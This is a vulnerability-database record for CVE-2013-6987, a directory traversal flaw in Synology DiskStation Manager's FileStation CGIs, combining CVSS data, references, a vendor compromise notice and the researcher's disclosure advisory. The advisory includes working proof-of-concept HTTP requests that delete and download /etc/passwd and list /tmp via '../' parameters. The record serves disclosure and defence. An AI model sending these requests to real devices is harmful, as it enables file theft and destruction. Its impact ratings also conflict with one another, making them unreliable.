var-201312-0278
Vulnerability from variot
Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/. Synology DiskStation Manager (DSM) of FileBrowser The component contains a directory traversal vulnerability.By a third party .. ( Dot dot ) including webapi/FileStation/ Arbitrary files may be read, written, and deleted via the following parameters in. Synology DiskStation Manager is prone to a multiple directory-traversal vulnerabilities. Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to bypass security restrictions and perform unauthorized actions on system and configuration files in the context of the application. Synology DiskStation Manager 4.3-3810 and prior are vulnerable. The operating system can manage data, documents, photos, music and other information. The vulnerability is caused by (1) the file_delete.cgi script does not filter the 'path' parameter correctly; (2) the file_share in the webapi/FileStation/ directory .cgi script does not filter 'folder_path' parameter correctly; (3) fbdownload/ directory does not filter 'dlink' parameter correctly; (4) html5_upload.cgi, file_download.cgi, file_sharing.cgi, file_MVCP.cgi and The file_rename.cgi script did not properly filter parameters. ********** Title: Synology DSM multiple directory traversal Version affected: <= 4.3-3810 Vendor: Synology Discovered by: Andrea Fabrizi Email: andrea.fabrizi@gmail.com Web: http://www.andreafabrizi.it Twitter: @andreaf83 Status: patched CVE: 2013-6987
I'm again here with a Synology DSM vulnerability.
Synology DiskStation Manager (DSM) it's a Linux based operating system, used for the DiskStation and RackStation products. This kind of vulnerability allows any authenticated user, even if not administrative, to access, create, delete, modify system and configuration files.
The only countermeasure implemented against this vulnerability is the check that the path starts with a valid shared folder, so is enough to put the "../" straight after, to bypass the security check.
Vulnerables CGIs: - /webapi/FileStation/html5_upload.cgi - /webapi/FileStation/file_delete.cgi - /webapi/FileStation/file_download.cgi - /webapi/FileStation/file_sharing.cgi - /webapi/FileStation/file_share.cgi - /webapi/FileStation/file_MVCP.cgi - /webapi/FileStation/file_rename.cgi
Not tested all the CGI, but I guess that many others are vulnerable, so don't take my list as comprehensive.
Following some examples ("test" is a valid folder name):
- Delete /etc/passwd
POST /webapi/FileStation/file_delete.cgi HTTP/1.1 Host: 192.168.56.101:5000 X-SYNO-TOKEN: XXXXXXXX Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 103 Cookie: stay_login=0; id=kjuYI0HvD92m6 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
- Arbitrary file download:
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1 Host: 192.168.56.101:5000 Connection: keep-alive Authorization: Basic XXXXXXXX ===========================================
2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd
- Remote file list:
POST /webapi/FileStation/file_share.cgi HTTP/1.1 Host: 192.168.56.101:5000 X-SYNO-TOKEN: XXXXXXXX Content-Length: 75 Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
Timeline: - 05/12/2013: First contact with the vendor - 06/12/2013: Vulnerability details sent to the vendor - 20/12/2013: Patch released by the vendor
.
http://www.synology.com/en-global/company/news/article/437
February 14, 2014\x97Synology\xae confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly.
The followings are possible symptoms to appear on affected DiskStation and RackStation:
Exceptionally high CPU usage detected in Resource Monitor:
CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their names
Appearance of non-Synology folder:
An automatically created shared folder with the name \x93startup\x94, or a non-Synology folder appearing under the path of \x93/root/PWNED\x94
Redirection of the Web Station:
\x93Index.php\x94 is redirected to an unexpected page
Appearance of non-Synology CGI program:
Files with meaningless names exist under the path of \x93/usr/syno/synoman\x94
Appearance of non-Synology script file:
Non-Synology script files, such as \x93S99p.sh\x94, appear under the path of \x93/usr/syno/etc/rc.d\x94
If users identify any of above situation, they are strongly encouraged to do the following:
For DiskStation or RackStation running on DSM 4.3, please follow the instruction here (http://www.synology.com/en-global/support/faq/348) to REINSTALL DSM 4.3-3827.
For DiskStation or RackStation running on DSM 4.0, it\x92s recommended to REINSTALL DSM 4.0-2259 or onward from Synology Download Center.
For DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it\x92s recommended to REINSTALL DSM 4.2-3243 or onward from Synology Download Center (http://www.synology.com/en-global/support/download).
Confidentiality Impact Complete (There is total information disclosure, resulting in all system files being revealed.) Integrity Impact Complete (There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.) Availability Impact Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.) Access Complexity Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. ) Authentication Not required (Authentication is not required to exploit the vulnerability.) Gained Access None Vulnerability Type(s) Execute Code
This is also known as the /PWNED or /lolz hack
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0278", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "diskstation manager", "scope": "eq", "trust": 1.9, "vendor": "synology", "version": "4.3-3810" }, { "model": "diskstation manager", "scope": "lt", "trust": 0.8, "vendor": "synology", "version": "4.3-3810 update 3" }, { "model": "diskstation manager", "scope": "eq", "trust": 0.3, "vendor": "synology", "version": "4.3" } ], "sources": [ { "db": "BID", "id": "64483" }, { "db": "JVNDB", "id": "JVNDB-2013-005755" }, { "db": "NVD", "id": "CVE-2013-6987" }, { "db": "CNNVD", "id": "CNNVD-201312-538" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:synology:diskstation_manager:4.3-3810:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-6987" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Andrea Fabrizi", "sources": [ { "db": "BID", "id": "64483" }, { "db": "PACKETSTORM", "id": "124563" }, { "db": "CNNVD", "id": "CNNVD-201312-538" } ], "trust": 1.0 }, "cve": "CVE-2013-6987", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2013-6987", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-66989", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-6987", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201312-538", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-66989", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2013-6987", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-66989" }, { "db": "VULMON", "id": "CVE-2013-6987" }, { "db": "JVNDB", "id": "JVNDB-2013-005755" }, { "db": "NVD", "id": "CVE-2013-6987" }, { "db": "CNNVD", "id": "CNNVD-201312-538" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/. Synology DiskStation Manager (DSM) of FileBrowser The component contains a directory traversal vulnerability.By a third party .. ( Dot dot ) including webapi/FileStation/ Arbitrary files may be read, written, and deleted via the following parameters in. Synology DiskStation Manager is prone to a multiple directory-traversal vulnerabilities. \nRemote attackers can use a specially crafted request with directory-traversal sequences (\u0027../\u0027) to bypass security restrictions and perform unauthorized actions on system and configuration files in the context of the application. \nSynology DiskStation Manager 4.3-3810 and prior are vulnerable. The operating system can manage data, documents, photos, music and other information. The vulnerability is caused by (1) the file_delete.cgi script does not filter the \u0027path\u0027 parameter correctly; (2) the file_share in the webapi/FileStation/ directory .cgi script does not filter \u0027folder_path\u0027 parameter correctly; (3) fbdownload/ directory does not filter \u0027dlink\u0027 parameter correctly; (4) html5_upload.cgi, file_download.cgi, file_sharing.cgi, file_MVCP.cgi and The file_rename.cgi script did not properly filter parameters. **************************************************************\nTitle: Synology DSM multiple directory traversal\nVersion affected: \u003c= 4.3-3810\nVendor: Synology\nDiscovered by: Andrea Fabrizi\nEmail: andrea.fabrizi@gmail.com\nWeb: http://www.andreafabrizi.it\nTwitter: @andreaf83\nStatus: patched\nCVE: 2013-6987\n**************************************************************\n\nI\u0027m again here with a Synology DSM vulnerability. \n\nSynology DiskStation Manager (DSM) it\u0027s a Linux based operating\nsystem, used for the DiskStation and RackStation products. \nThis kind of vulnerability allows any authenticated user, even if not\nadministrative, to access, create, delete, modify system and\nconfiguration files. \n\nThe only countermeasure implemented against this vulnerability is the\ncheck that the path starts with a valid shared folder, so is enough to\nput the \"../\" straight after, to bypass the security check. \n\nVulnerables CGIs:\n- /webapi/FileStation/html5_upload.cgi\n- /webapi/FileStation/file_delete.cgi\n- /webapi/FileStation/file_download.cgi\n- /webapi/FileStation/file_sharing.cgi\n- /webapi/FileStation/file_share.cgi\n- /webapi/FileStation/file_MVCP.cgi\n- /webapi/FileStation/file_rename.cgi\n\nNot tested all the CGI, but I guess that many others are vulnerable,\nso don\u0027t take my list as comprehensive. \n\nFollowing some examples (\"test\" is a valid folder name):\n\n- Delete /etc/passwd\n===========================================\nPOST /webapi/FileStation/file_delete.cgi HTTP/1.1\nHost: 192.168.56.101:5000\nX-SYNO-TOKEN: XXXXXXXX\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 103\nCookie: stay_login=0; id=kjuYI0HvD92m6\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n\npath=/test/../../etc/passwd\u0026accurate_progress=true\u0026api=SYNO.FileStation.Delete\u0026method=start\u0026version=1\n===========================================\n\n- Arbitrary file download:\n===========================================\nGET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1\nHost: 192.168.56.101:5000\nConnection: keep-alive\nAuthorization: Basic XXXXXXXX\n===========================================\n\n2f746573742f2e2e2f2e2e2f6574632f706173737764 -\u003e /test/../../etc/passwd\n\n- Remote file list:\n=========================\nPOST /webapi/FileStation/file_share.cgi HTTP/1.1\nHost: 192.168.56.101:5000\nX-SYNO-TOKEN: XXXXXXXX\nContent-Length: 75\nCookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2\n\nfolder_path=/test/../../tmp\u0026api=SYNO.FileStation.List\u0026method=list\u0026version=1\n==========================\n\nTimeline:\n- 05/12/2013: First contact with the vendor\n- 06/12/2013: Vulnerability details sent to the vendor\n- 20/12/2013: Patch released by the vendor\n\n\n. \n\nhttp://www.synology.com/en-global/company/news/article/437\n\nFebruary 14, 2014\\x97Synology\\xae confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly. \n\nThe followings are possible symptoms to appear on affected DiskStation and RackStation:\n\n Exceptionally high CPU usage detected in Resource Monitor:\n CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their names\n Appearance of non-Synology folder:\n An automatically created shared folder with the name \\x93startup\\x94, or a non-Synology folder appearing under the path of \\x93/root/PWNED\\x94\n Redirection of the Web Station:\n \\x93Index.php\\x94 is redirected to an unexpected page\n Appearance of non-Synology CGI program:\n Files with meaningless names exist under the path of \\x93/usr/syno/synoman\\x94\n Appearance of non-Synology script file:\n Non-Synology script files, such as \\x93S99p.sh\\x94, appear under the path of \\x93/usr/syno/etc/rc.d\\x94\n\nIf users identify any of above situation, they are strongly encouraged to do the following:\n\n For DiskStation or RackStation running on DSM 4.3, please follow the instruction here (http://www.synology.com/en-global/support/faq/348) to REINSTALL DSM 4.3-3827. \n For DiskStation or RackStation running on DSM 4.0, it\\x92s recommended to REINSTALL DSM 4.0-2259 or onward from Synology Download Center. \n For DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it\\x92s recommended to REINSTALL DSM 4.2-3243 or onward from Synology Download Center (http://www.synology.com/en-global/support/download). \n\nConfidentiality Impact \tComplete (There is total information disclosure, resulting in all system files being revealed.)\nIntegrity Impact \tComplete (There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.)\nAvailability Impact \tComplete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.)\nAccess Complexity \tLow (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )\nAuthentication \tNot required (Authentication is not required to exploit the vulnerability.)\nGained Access \tNone\nVulnerability Type(s) \tExecute Code\n\nThis is also known as the /PWNED or /lolz hack", "sources": [ { "db": "NVD", "id": "CVE-2013-6987" }, { "db": "JVNDB", "id": "JVNDB-2013-005755" }, { "db": "BID", "id": "64483" }, { "db": "VULHUB", "id": "VHN-66989" }, { "db": "VULMON", "id": "CVE-2013-6987" }, { "db": "PACKETSTORM", "id": "124563" }, { "db": "PACKETSTORM", "id": "125864" } ], "trust": 2.25 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-66989", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=30475", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-66989" }, { "db": "VULMON", "id": "CVE-2013-6987" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-6987", "trust": 3.1 }, { "db": "BID", "id": "64483", "trust": 2.1 }, { "db": "PACKETSTORM", "id": "124563", "trust": 1.9 }, { "db": "EXPLOIT-DB", "id": "30475", "trust": 1.8 }, { "db": "JVNDB", "id": "JVNDB-2013-005755", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201312-538", "trust": 0.7 }, { "db": "FULLDISC", "id": "20131220 SYNOLOGY DSM MULTIPLE DIRECTORY TRAVERSAL", "trust": 0.6 }, { "db": "XF", "id": "89892", "trust": 0.6 }, { "db": "XF", "id": "20136987", "trust": 0.6 }, { "db": "SEEBUG", "id": "SSVID-83858", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-66989", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2013-6987", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "125864", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-66989" }, { "db": "VULMON", "id": "CVE-2013-6987" }, { "db": "BID", "id": "64483" }, { "db": "JVNDB", "id": "JVNDB-2013-005755" }, { "db": "PACKETSTORM", "id": "124563" }, { "db": "PACKETSTORM", "id": "125864" }, { "db": "NVD", "id": "CVE-2013-6987" }, { "db": "CNNVD", "id": "CNNVD-201312-538" } ] }, "id": "VAR-201312-0278", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-66989" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T12:08:53.979000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "DS114 Release Notes", "trust": 0.8, "url": "http://www.synology.com/en-us/releasenote/model/ds114" }, { "title": "", "trust": 0.1, "url": "https://github.com/khulnasoft-labs/awesome-security " } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-6987" }, { "db": "JVNDB", "id": "JVNDB-2013-005755" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-66989" }, { "db": "JVNDB", "id": "JVNDB-2013-005755" }, { "db": "NVD", "id": "CVE-2013-6987" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://seclists.org/fulldisclosure/2013/dec/177" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/64483" }, { "trust": 1.8, "url": "http://www.synology.com/en-us/releasenote/model/ds114" }, { "trust": 1.8, "url": "http://www.exploit-db.com/exploits/30475" }, { "trust": 1.8, "url": "http://packetstormsecurity.com/files/124563" }, { "trust": 1.2, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89892" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6987" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6987" }, { "trust": 0.6, "url": "http://xforce.iss.net/xforce/xfdb/89892" }, { "trust": 0.3, "url": "http://www.synology.com/dsm/index.php?lang=us" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6987" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/22.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.exploit-db.com/exploits/30475/" }, { "trust": 0.1, "url": "http://www.andreafabrizi.it" }, { "trust": 0.1, "url": "http://www.synology.com/en-global/company/news/article/437" }, { "trust": 0.1, "url": "http://www.synology.com/en-global/support/faq/348)" }, { "trust": 0.1, "url": "http://www.synology.com/en-global/support/download)." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6955" } ], "sources": [ { "db": "VULHUB", "id": "VHN-66989" }, { "db": "VULMON", "id": "CVE-2013-6987" }, { "db": "BID", "id": "64483" }, { "db": "JVNDB", "id": "JVNDB-2013-005755" }, { "db": "PACKETSTORM", "id": "124563" }, { "db": "PACKETSTORM", "id": "125864" }, { "db": "NVD", "id": "CVE-2013-6987" }, { "db": "CNNVD", "id": "CNNVD-201312-538" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-66989" }, { "db": "VULMON", "id": "CVE-2013-6987" }, { "db": "BID", "id": "64483" }, { "db": "JVNDB", "id": "JVNDB-2013-005755" }, { "db": "PACKETSTORM", "id": "124563" }, { "db": "PACKETSTORM", "id": "125864" }, { "db": "NVD", "id": "CVE-2013-6987" }, { "db": "CNNVD", "id": "CNNVD-201312-538" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-12-31T00:00:00", "db": "VULHUB", "id": "VHN-66989" }, { "date": "2013-12-31T00:00:00", "db": "VULMON", "id": "CVE-2013-6987" }, { "date": "2013-12-20T00:00:00", "db": "BID", "id": "64483" }, { "date": "2014-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-005755" }, { "date": "2013-12-23T15:25:15", "db": "PACKETSTORM", "id": "124563" }, { "date": "2014-03-25T23:12:57", "db": "PACKETSTORM", "id": "125864" }, { "date": "2013-12-31T16:04:23.790000", "db": "NVD", "id": "CVE-2013-6987" }, { "date": "2013-12-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201312-538" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-29T00:00:00", "db": "VULHUB", "id": "VHN-66989" }, { "date": "2017-08-29T00:00:00", "db": "VULMON", "id": "CVE-2013-6987" }, { "date": "2013-12-20T00:00:00", "db": "BID", "id": "64483" }, { "date": "2014-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-005755" }, { "date": "2017-08-29T01:34:02.340000", "db": "NVD", "id": "CVE-2013-6987" }, { "date": "2014-01-02T00:00:00", "db": "CNNVD", "id": "CNNVD-201312-538" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "125864" }, { "db": "CNNVD", "id": "CNNVD-201312-538" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Synology DiskStation Manager of FileBrowser Directory traversal vulnerability in components", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-005755" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "path traversal", "sources": [ { "db": "CNNVD", "id": "CNNVD-201312-538" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.